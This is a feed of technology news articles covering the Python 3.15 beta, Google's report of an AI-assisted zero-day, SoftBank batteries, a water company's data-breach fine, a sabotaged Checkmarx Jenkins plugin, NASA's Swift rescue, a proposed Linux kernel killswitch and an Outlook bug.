The Python team has released the first beta of version 3.15, with new features including a stable application binary interface (ABI) for free-threaded CPython, lazy imports to speed startup time, a new zero-overhead sampling profiler, use of UTF-8 text encoding by default, and a faster just-in-time (JIT) compiler. Python's development cycle bars new features after the first beta release. There is typically a new feature release in October each year, with version 3.15 currently scheduled for October 1. The option to remove the global interpreter lock (GIL), available in Python 3.14, was the biggest change to Python for years, enabling efficient concurrency on multi-core CPUs. The new stable ABI means that C extensions can now be compiled for multiple minor versions of free-threaded builds, though the team warns that doing so means only a subset of the full CPython API is available. The existing stable ABI remains available, and it is possible to compile for both. Extension maintainers will benefit, since building new versions for every minor Python release is a burden. Explicit lazy imports can improve startup time for Python applications by deferring module loading until it is first accessed. Otherwise, an imported module is loaded and compiled to bytecode immediately - though developers could use workarounds at the expense of code readability. The solution for this is a new keyword: lazy import json A new sampling profiler called Tachyon works by capturing stack traces from running processes, instead of instrumenting function calls. According to the docs, the approach "provides virtually zero overhead while achieving sampling rates of up to 1,000,000 Hz" and can be used to debug performance issues in production. Text encoding in Python 3.15 is now UTF-8 by default, though explicit encoding is still recommended for best compatibility. CPython is the reference implementation of Python, and improving its performance has long been a focus. An experimental JIT compiler was introduced in version 3.14, though not recommended for production use - and could make code run more slowly. In 3.15, the JIT compiler is much improved, and the team now reports an 8-9 percent mean performance improvement over the CPython interpreter on x86-64 Linux, and 12-13 percent on Apple silicon macOS, though some code may still run up to 15 percent slower. These figures may change before the final release. In contrast, the incremental garbage collector released in 3.14 has been reverted, following reports of memory leaks. This aimed to improve performance by reclaiming memory less frequently. It was removed in Python 3.14.5 and the core team stated: "If we want to reintroduce the incremental GC for 3.16, it can go through the regular PEP process and be more thoroughly evaluated." The full list of what is new in 3.15 is documented here.®
Categories: Linux fréttir
Google says criminals used AI-built zero-day in planned mass hack spree
Google says crooks already have AI cooking up zero-days, and claims one nearly escaped into the wild before the company stopped it. In a report shared with The Register ahead of publication on Monday, Google’s Threat Intelligence Group said that it has identified what it believes is the first real-world case of cyber-baddies using AI to discover and weaponize a zero-day vulnerability in a planned mass-exploitation campaign. The bug, a two-factor authentication bypass in a popular open source web-based administration platform, was reportedly developed by criminals working together on a large-scale intrusion operation. GTIG said that the attackers appear to have used an AI model to both identify the flaw and help turn it into a usable exploit. Google worked with the unnamed vendor to quietly patch the issue before the campaign could properly kick off, which it believes may have disrupted the operation before it gained traction. The company insists that neither Gemini nor Anthropic’s Mythos was involved, but said that the exploit itself looked suspiciously machine-made. According to the report, the Python script included what Google described as "educational docstrings," a hallucinated CVSS score, and a polished textbook coding structure that looked heavily influenced by LLM training data. Google said that the issue stemmed from developers hard-coding a trust exception into the authentication flow, creating a hole that attackers could exploit to sidestep 2FA checks. According to the firm, those higher-level logic mistakes are exactly the kind of thing modern AI models are starting to get surprisingly good at finding. "While fuzzers and static analysis tools are optimized to detect sinks and crashes, frontier LLMs excel at identifying these types of high-level flaws and hardcoded static anomalies," the report said. John Hultquist, chief analyst at Google Threat Intelligence Group, said anyone still treating AI-assisted vulnerability discovery as a future problem is already behind. "There’s a misconception that the AI vulnerability race is imminent. The reality is that it’s already begun. For every zero-day we can trace back to AI, there are probably many more out there," Hultquist said. "Threat actors are using AI to boost the speed, scale, and sophistication of their attacks. It enables them to test their operations, persist against targets, build better malware, and make many other improvements. State actors are taking advantage of this technology but the criminal threat shouldn’t be underestimated, especially given their history of broad, aggressive attacks." Google’s report suggests that the zero-day case is part of something much bigger. GTIG said North Korean crew APT45 had been using AI to churn through thousands of exploit checks and bulk out its toolkit, while Chinese state-linked operators were experimenting with AI systems for vulnerability hunting and automated probing of targets. Google also described malware families padded out with AI-generated junk code designed to confuse analysts, Android backdoors using Gemini APIs to autonomously navigate infected devices, and Russian influence operations stitching fabricated AI-generated audio into legitimate news footage. The awkward bit for everyone else is that this still appears to be the clumsy early phase. Google said mistakes in the exploit’s implementation probably interfered with the criminals’ plans this time around, but that may not stay true for long. ®
Categories: Linux fréttir
SoftBank bets on battery building to back bit barns
SoftBank is getting into the datacenter battery business and plans to start manufacturing them on the scale of gigawatt-hours per year of capacity to support the power needs of AI infrastructure, including its own. The Japan-based tech investment biz says it aims to deploy the battery systems it is developing at its own large-scale AI server farms initially, but plans to make them more widely available in future. It hopes to begin mass production in financial year 2027, and expects the operation to generate revenue of ¥100 billion (over $600 million) per year by 2030. SoftBank is working with two South Korean firms that have a track record in advanced battery-related technologies. One is Cosmos Lab, developer of zinc-halogen batteries that use pure water as an electrolyte, making them non-flammable, and the other is DeltaX, which designs and manufactures battery-based energy storage systems (BESS). Reg readers may recall that SoftBank last year bought the rights to a former Sharp LCD panel factory in Sakai City, Osaka prefecture in Japan, and said it planned to convert it into a datacenter to operate AI agents developed jointly with ChatGPT creator OpenAI. The site will now become an industrial cluster, home to its battery manufacturing facility as well. SoftBank referred to it as a core hub to establish its AX Factory (a center for datacenter operations and AI infrastructure hardware manufacturing), and GX Factory (serving as a manufacturing facility for next-gen batteries, solar panels, and related products). One detail missing is how much cash the investment biz is pouring into this venture. We asked how much the project is costing to get off the ground, but a SoftBank spokesperson told us it was not able to comment. SoftBank plans to start by deploying the battery systems produced at its GX Factory in its own server halls, but will then provide them for grid applications in Japan, plus factories and other industrial uses. It hopes to take the technology into global markets over the medium term. In presentation slides seen by The Register, the firm says BESS for commercial and industrial use will have a capacity of 140 kWh to 560 kWh, while those for large-scale or grid-scale use will come in at 2,240 kWh to 5,380 kWH. According to SoftBank, DeltaX has developed BESS capable of energy densities exceeding 5 MWh in a standard commercial container format (a 20-foot shipping container). The way DeltaX packs together and connects the battery cells in its BESS maximizes their performance, Softbank claims, and by applying these technologies to next-generation battery cells (presumably referring to those of Cosmos Lab), further improvements in energy storage can be achieved. Those battery cells, which SoftBank calls Innovative batteries, use a halogen-based material for the cathode and zinc for the anode, which it says offers charge-discharge characteristics with minimal energy loss and energy efficiency comparable to existing lithium-ion batteries. As they use pure water as the electrolyte, SoftBank claims these batteries are inherently safer and won't catch fire, unlike lithium-ion batteries, which have a well-documented tendency to do exactly that. SoftBank has its finger in a number of pies when it comes to AI projects. The firm was aiming to pump $22.5 billion into LLM developer OpenAI before the end of 2025, and more recently announced plans for a massive 10 GW datacenter campus on US Department of Energy (DoE) land in Ohio. The company is also majority shareholder of chip designer Arm, which recently revealed its first Arm-branded datacenter processor targeting AI, and owns Ampere Computing, which makes Arm-based server chips. ®
Categories: Linux fréttir
Water company's leaky security earns near-£1M fine
The UK's data protection watchdog has fined South Staffordshire Water's parent company nearly £1 million over security failings exposed by the Cl0p ransomware attack in 2022. Issuing the fine of £963,900 ($1.3 million), the Information Commissioner's Office (ICO) said the attack exposed "significant failures in the company's approach to data security." The attack, claimed by Cl0p, was detected in July 2022 after engineers responded to performance issues, but a thorough postmortem revealed the initial intrusion occurred almost two years earlier, in September 2020. Among the key failures that led to the attack, and the nearly two-year delay in detecting it, were: Limited controls, which allowed the attacker to escalate their privileges to admin after gaining an initial foothold on the network Inadequate monitoring and logging. The ICO noted that only 5 percent of South Staffordshire's IT environment was being monitored Running unsupported software, including Windows Server 2003 Poor vulnerability management. Investigations showed critical systems were unpatched against known vulnerabilities, and the company failed to regularly run internal or external security scans The ICO said 633,887 people were affected by the attack and the resulting leak of company files. For customers, this included personally identifiable information, usernames and passwords used to access its online services, and bank account numbers and sort codes. For a limited number of customers on the utility company's Priority Services Register, the stolen information could have led to their disabilities being inferred. Cl0p also pilfered HR information, including employees' National Insurance numbers. The trove of company data was later leaked online in a file exceeding 4 TB. At the time of the attack, South Staffordshire handled the data of some 1.85 million individuals. Most of these were either current or former customers, but several thousand staffers' details were also retained. "Customers do not have the choice over which water company serves them – they are required to share their personal information and place their trust in that provider," said Ian Hulme, interim executive director for regulatory supervision at the ICO. "It is therefore essential that water companies honor that trust by taking their data protection responsibilities seriously." "The steps that South Staffordshire failed to take are established, widely understood and effective controls to protect computer networks. The ICO expects all organizations – and particularly those handling large volumes of personal information as part of critical national infrastructure – to have these in place." "Waiting for performance issues or a ransom note to discover a breach is not acceptable. Proactive security is a legal requirement, not an optional extra." The ICO announced its intent to fine South Staffordshire in December 2025. The regulator said after reviewing the company's representations, which included agreement with its findings and an early admission of wrongdoing, it reduced the fine by 40 percent. "We accept the Information Commissioner's Office's decision relating to the cyberattack our Group experienced in 2022, and are sorry for the worry and concern it caused for customers and employees," said Charley Maher, group CEO at South Staffordshire Plc, in a statement provided to The Register. "We took immediate action to contain the incident, support those impacted, and reduce the risk of recurrence." "We have invested significantly to further strengthen our cybersecurity resilience, governance, and monitoring, and we continue to enhance our capabilities as the threat landscape evolves. Protecting customer and employee information is a responsibility we take extremely seriously, and we remain focused on learning from this incident and maintaining strong safeguards across the Group." ®
Categories: Linux fréttir
Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. It updated customers on Saturday, May 9, after discovering a version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, was made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed by several hundred controllers, the plugin remains available at the time of writing, and appears as the most recently available version, although pull requests actioned on Monday morning suggest this will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the early supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware. These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugins page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim CheckMarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As previously seen in The Register, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
Categories: Linux fréttir
NASA's bid to save Swift from fiery death passes another hurdle
A rescue mission for NASA's Neil Gehrels Swift Observatory has taken another step forward following the completion of environmental tests at the agency's Goddard Space Flight Center. The purpose of the tests was to assess how the LINK robotic servicing spacecraft, supplied by Katalyst Space Technologies, would withstand the forces of launch and the extremes of the orbital environment. The mission is ambitious and fast-paced. It was only in August 2025 that NASA asked US industry for ideas on rescuing the observatory, whose orbit is decaying faster than expected. Katalyst was awarded the contract and has been working against the clock to launch its servicing spacecraft before Swift reaches the point of no return. In February 2026, NASA ended most science operations aboard Swift to keep the spacecraft in orbit long enough for the rescue mission. At the time, June 2026 was Katalyst's expected launch date and, thanks to the successful completion of testing, the mission remains on track. The next step is for Northrop Grumman to integrate LINK into its Pegasus rocket in early June, with launch planned from the last airworthy L-1011 TriStar (dubbed Stargazer) later that month. The LINK spacecraft has undergone vibration testing to simulate a Pegasus launch and thermal-vacuum testing in Goddard's Space Environment Simulator, where it experienced space-like hot and cold temperature extremes. The team also test-fired the spacecraft's three xenon-powered ion thrusters and deployed one of its robotic arms. Kieran Wilson, LINK's principal investigator at Katalyst, said: "We're in an unusual situation where the schedule dictates how much risk we’re willing to accept, rather than the other way around. "The clock is ticking on Swift's descent, so we have to find a balance between testing and problem solving that gives the mission the best chance of success." After paying tribute to the speed at which Katalyst was moving, Swift mission director John Van Eepoel said: "Swift will likely re-enter the atmosphere sometime later this year if we don't attempt to lift it to a higher altitude." In this instance, the Swift observatory has nothing to lose and everything to gain from the reboost mission. The spacecraft is more than 20 years into a two-year task to study gamma-ray bursts. If it weren't for its decaying orbit (and the Trump administration's effort to terminate it - the mission was on the chopping block in the FY2026 budget proposal - it could continue observations for years to come. ®
Categories: Linux fréttir
Linux kernel maintainers pitch emergency killswitch after CopyFail and Dirty Frag chaos
Linux kernel maintainers are considering giving admins a giant red emergency button to smash the next time another nasty vulnerability drops before patches are ready. The proposed feature, named "Killswitch," would let admins temporarily disable specific vulnerable kernel functions at runtime instead of sitting around waiting for fixes. The so-called patch was submitted by Linux stable kernel co-maintainer and Nvidia engineer Sasha Levin after a bruising couple of weeks for Linux security. The proposal basically gives admins a way to pull the plug on vulnerable kernel functionality. If exploit code starts spreading before patches arrive, the targeted function can be disabled so calls to it immediately fail instead of reaching the vulnerable code. "When a (security) issue goes public, fleets stay exposed until a patched kernel is built, distributed, and rebooted into," Levin wrote. "For many such issues the simplest mitigation is to stop calling the buggy function. Killswitch provides that." The past couple of weeks have not exactly been great advertising for the traditional "wait for patches" approach. First we saw the disclosure of CopyFail, a Linux local privilege escalation bug that quickly moved from disclosure to active exploitation. Days later, Dirty Frag emerged: another Linux privilege escalation flaw with public exploit code and no official fixes, after coordinated disclosure efforts fell apart before patches were ready. As Levin's proposal itself puts it, organizations are often left exposed "until a patched kernel is built, distributed, and rebooted into." Killswitch aims to fill that gap. Killswitch would work through the kernel's security interface and is mainly intended for subsystems that systems can survive without for a while. In practical terms, Levin's argument is that temporarily losing some networking or crypto functionality is preferable to leaving known vulnerable code exposed on production systems. However, the feature would not fix vulnerable code or replace it with safe code. It just slams the door shut on the dangerous bit until administrators can properly update their kernels. Naturally, handing sysadmins the ability to selectively shoot pieces of the kernel in the head has already sparked debate among developers over stability, potential for abuse, and whether people can be trusted not to accidentally saw off important limbs in production. Still, after CopyFail and Dirty Frag, the kernel community increasingly seems to be arriving at the conclusion that running broken functionality may now be preferable to running weaponized functionality. ®
Categories: Linux fréttir
Classic Outlook's Quick Steps trip over Microsoft bug
If you're using Quick Steps in Microsoft Outlook and wondering why they're grayed out, a bug introduced in version 2512 is the culprit. Classic Outlook is approaching the twilight years of its prodigiously long life, but users can still fall victim to productivity-killing bugs – in this case, a problem with Quick Steps. Quick Steps automates common or repetitive tasks in Outlook. Always have to move a bunch of messages to a specific folder? Quick Steps is your friend. Pin an email and mark it as unread? Again, the actions can be lined up in Quick Steps and executed with a single click or a keyboard shortcut. Until Microsoft breaks it. In a support article, Microsoft has confirmed that in some situations, Quick Steps in classic Outlook can appear grayed out. The workaround (if rolling back or switching clients isn't an option) is to use a keyboard shortcut. "The shortcut will work even if the Quick Step is grayed out in the user interface," Microsoft wrote. The problem is that if a Quick Step contains actions that "can't be fulfilled," it's grayed out. Microsoft's own the example states: "A Quick Step that moves a message to a folder and clears categories will be grayed out in messages where there are no categories applied." "This is known to happen with Quick Steps with Flags and Categories actions such as 'Clear flags on message' or 'Clear categories'." Classic Outlook has suffered several glitches of late. Microsoft admitted in April that it could occasionally chow down on system resources for no obvious reason. Then there was its tendency to explode when opening too many emails. Microsoft has been clear that Classic Outlook's days are numbered. Outlook 2024 is due to drop out of mainstream support in 2029. However, there remains much that Classic Outlook does which New Outlook doesn't, such as COM support. And, when Microsoft hasn’t broken them, Quick Steps. ®
Categories: Linux fréttir
